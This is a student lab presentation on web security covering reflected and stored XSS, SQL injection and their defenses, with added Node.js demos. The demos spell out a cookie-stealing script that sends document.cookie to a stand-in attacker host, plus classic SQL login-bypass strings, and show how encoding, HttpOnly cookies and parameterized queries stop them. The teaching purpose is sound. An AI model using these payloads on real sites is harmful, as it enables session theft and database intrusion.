Group 18: Chris Hood Brett Poche


1 ECE 4112: Lab 9, Web Security (Spring Break Edition)
Group 18: Chris Hood, Brett Poche

2 Outline
Cross Site Scripting: definition, the three main XSS attack types, XSS defenses
Lab procedures
Each week two lab groups will combine to do one brief PowerPoint presentation in class on the lab due date. This presentation (and leading of a class discussion) will be a brief summary of 1) the threats and techniques identified in the lab and 2) the defenses one could use to protect against those threats.

3 Setup
Apache Server – open source HTTP web server
PHP – open source, reflective programming language used to develop server-side applications, dynamic web content, and software applications (MediaWiki)
MySQL – SQL database management system

4 Cross Site Scripting
XSS refers to a vulnerability in web applications where an attacker can "inject code into a page in a manner such that the web page subsequently executes the code." It is seen in dynamic web applications that do not properly validate and escape user input before echoing it back into HTML, so the injected script runs in the victim's browser with the vulnerable page's origin.

5 XSS Attacks
Type 0: DOM-based or local
Type 1: Non-persistent or reflected
Type 2: Persistent or stored

6 Type 0 Attack
The payload never has to pass through the server: the page's own JavaScript reads attacker-controlled data (for example from the URL fragment) and writes it into the DOM, where it executes.
The "local" variant utilizes JavaScript's privileges in the "local zone": a vulnerable page opened as a local file runs in IE's Local Machine Zone and can attack the local machine with the IE user's privileges.
Example: a web page's JavaScript is used to launch code stored on a viewer's computer.
Not in lab.

7 Type 1 Attack
Supplied code is reflected straight back in the server's response (the server does not execute it; it just echoes it into the page) and runs immediately in the victim's browser, so the attacker has to get the victim to open a crafted URL.
Example: inserting JavaScript directly into a search query
Lab Section 1

8 Type 2 Attack
Inserted code is stored directly (in a database) and is later displayed to every visitor without being escaped, so no crafted link is needed.
Example: inserting JavaScript code into a forum message
Lab Section 1

9 Lab
Section 1: Cross-Site Scripting
Section 2: SQL Injection on Linux Apache Web Server
Section 3: Practical Web Exercise on Windows Server

10 Lab Section 1
Stealing cookies with Type 1 & 2 attacks
Cookie – maintains state information between HTTP requests
Harvesting user names and super secret passwords
Lots of sites use cookies to store info, like user name/pass, shopping cart, tracking purposes, etc. Any script running in the page can read them through document.cookie unless the cookie was set with the HttpOnly flag.

11 Lab Example
This was done by placing JavaScript code directly into the URL (type 1 XSS attack); the server echoed the query parameter back into the page without escaping it.

12 Lab Example 2
This was done by placing JavaScript directly into the forum message, so it was stored, placed into the HTML of the thread page and directly interpreted by every browser that loaded it. Both of these aren't that harmful alone, but they are a good proof of concept along the lines of what can be done and how easy/stealthy it is.
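The two lab examples above, as an added example that is not code from the lab or the presentation: a Node.js model of the search page (type 1) and forum board (type 2) that builds the HTML the PHP server would emit, first without and then with the output encoding discussed under XSS Defenses. The hostnames lab.example and attacker.example, the users alice and mallory, and the page layouts are assumptions made for this demo.

```javascript
// Added example, not code from the lab or the presentation: a Node.js model
// of the two Lab Section 1 pages (a search page and a forum board) so the
// HTML the PHP server would emit can be inspected without a web server.
// The hosts lab.example and attacker.example, the users alice/mallory and
// the page layouts are assumptions made for this demo.

// Cookie-stealing payload of the kind used in the lab: when the victim's
// browser parses it, it requests an "image" from the attacker's host with the
// victim's cookies in the query string, and the attacker reads the web log.
const PAYLOAD =
  '<script>new Image().src="http://attacker.example/steal?c="+document.cookie</script>';

// Output encoding for HTML text and attribute context: every character that
// can change the structure of the markup becomes a character entity.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Type 1 (reflected): the server echoes the q= parameter from the URL into the
// page. encode=false is the vulnerable lab page; encode=true is the fix.
function renderSearchPage(url, encode) {
  const q = new URL(url).searchParams.get('q') || '';
  const shown = encode ? escapeHtml(q) : q;
  return '<html><body><h1>Results for: ' + shown + '</h1></body></html>';
}

// Type 2 (stored): messages come back out of the database later. The payload
// is inert while stored and only fires when rendered without encoding.
function renderForum(messages, encode) {
  const enc = encode ? escapeHtml : (s) => s;
  const items = messages
    .map((m) => '<li><b>' + enc(m.user) + '</b>: ' + enc(m.body) + '</li>')
    .join('');
  return '<html><body><ul>' + items + '</ul></body></html>';
}

// Crude check, sufficient for the demo: did a script element that the page
// author never wrote end up in the markup? (The real judge is the browser DOM.)
function containsInjectedScript(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed sample data: the attacker's crafted link (type 1) and a forum
// table holding one honest post and one from the attacker (type 2).
const attackUrl = 'http://lab.example/search.php?q=' + encodeURIComponent(PAYLOAD);
const forumDb = [
  { user: 'alice', body: 'Has anyone finished lab 9?' },
  { user: 'mallory', body: 'Sure, see: ' + PAYLOAD },
];

// Summarise all four cases; the returned object is what a test can assert on.
function runXssDemo() {
  return {
    reflectedVulnerable: containsInjectedScript(renderSearchPage(attackUrl, false)),
    reflectedEncoded: containsInjectedScript(renderSearchPage(attackUrl, true)),
    storedVulnerable: containsInjectedScript(renderForum(forumDb, false)),
    storedEncoded: containsInjectedScript(renderForum(forumDb, true)),
  };
}

console.log(runXssDemo());
console.log(renderSearchPage(attackUrl, true));
```

Run it with `node` and compare the two printed pages: in the encoded version the payload is still visible on screen as text, but `&lt;script&gt;` is never parsed as an element. Encoding protects the page; marking the session cookie HttpOnly additionally keeps document.cookie empty for any script that does get through.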

13 Lab Section 2
SQL injection via query string and login fields
Use company's database against themselves
Obtain user information directly from database
SELECT statements inserted directly into the URL (**not JavaScript anymore**); the server concatenates the parameter into its own query, so the attacker's SQL runs with the application's database privileges
Best defense: input validation; better still, parameterized queries (prepared statements), which keep user data out of the SQL text entirely
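The two injection points named on this slide (login fields and a numeric id in the query string), as an added example that is not code from the lab: it shows the SQL text that string concatenation produces for classic inputs, why escaping quotes is not enough for an unquoted id, and what input validation and a parameterized query each change. The users and products tables, the column names and all sample inputs are constructed for this demo.

```javascript
// Added example, not code from the lab: how the two Lab Section 2 injection
// points (a login form and a numeric id in the query string) turn user input
// into SQL, and what each of the two fixes does. The users/products tables
// and all sample inputs are constructed for this demo.

// Vulnerable: the login query built by string concatenation, as in the lab.
function buildLoginQueryVulnerable(username, password) {
  return "SELECT id FROM users WHERE username='" + username +
         "' AND password='" + password + "'";
}

// Fix: a parameterized query. The statement text is fixed; the values travel
// separately and the database never parses them as SQL.
function buildLoginQueryParameterized(username, password) {
  return {
    sql: 'SELECT id FROM users WHERE username=? AND password=?',
    params: [username, password],
  };
}

// Vulnerable: an id taken straight from ?id=... in the URL, unquoted.
function buildProductQueryVulnerable(rawId) {
  return 'SELECT name, price FROM products WHERE id=' + rawId;
}

// Fix (input validation): an id is a short string of digits or it is rejected
// before it gets anywhere near the query.
function parseId(rawId) {
  if (!/^\d{1,10}$/.test(rawId)) {
    throw new Error('invalid id: ' + rawId);
  }
  return Number(rawId);
}

function buildProductQuerySafe(rawId) {
  return {
    sql: 'SELECT name, price FROM products WHERE id=?',
    params: [parseId(rawId)],
  };
}

// Escaping quotes (the "sanitize special characters" idea) only helps inside a
// quoted string literal; it does nothing for the unquoted numeric id above.
function escapeSqlString(s) {
  return String(s).replace(/'/g, "''");
}

// Classic login-bypass inputs, constructed here.
const TAUTOLOGY = "' OR '1'='1";
const COMMENT_OUT = "admin'-- ";

// Build every case once; the returned object is what a test can assert on.
function runSqliDemo() {
  let rejected = false;
  try { parseId('1 OR 1=1'); } catch (e) { rejected = true; }
  return {
    tautology: buildLoginQueryVulnerable('admin', TAUTOLOGY),
    commentedOut: buildLoginQueryVulnerable(COMMENT_OUT, 'x'),
    escapedNowSafe: buildLoginQueryVulnerable('admin', escapeSqlString(TAUTOLOGY)),
    parameterized: buildLoginQueryParameterized('admin', TAUTOLOGY),
    numericInjected: buildProductQueryVulnerable('1 OR 1=1'),
    numericEscapedStillInjected: buildProductQueryVulnerable(escapeSqlString('1 OR 1=1')),
    numericRejected: rejected,
    numericSafe: buildProductQuerySafe('42'),
  };
}

console.log(runSqliDemo());
```

Reading the printed queries is the whole point: `password='' OR '1'='1'` turns the WHERE clause into a tautology, `username='admin'-- ` comments the password check away, and `id=1 OR 1=1` is still injected after quote-escaping because there was never a quote to break out of. Only the parameterized form and the validated id leave the statement structure untouched.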

14 XSS Defenses
Disable JavaScript – not feasible
Sanitize user input – search input for blacklisted code. Blacklisted code includes code that contains specific SQL queries and/or JavaScript. Sanitizing means looking for special characters: single quotes, semicolons, /* comments, and <> marks. (Replacing single quotes with double quotes is not a safe transformation; escape them, or better, encode on output.)
Online research led to similar suggestions (three results). Other suggestions?
Caveat: blacklists are routinely bypassed (case changes, alternate encodings, event handlers such as onerror instead of a script tag). The reliable defense is context-aware output encoding: HTML-entity-encode <, >, &, " and ' at the point where user data is written into the page, mark session cookies HttpOnly, and use parameterized queries for the database.

15 Lab Section 3
Basic No-No's:
Predictable file locations
Weak password recovery
Information leakage
Suggestions for other precautions?

16 Wrap-up
Cross Site Scripting: definition, 3 main XSS attacks, XSS defenses
Lab procedures
Questions???

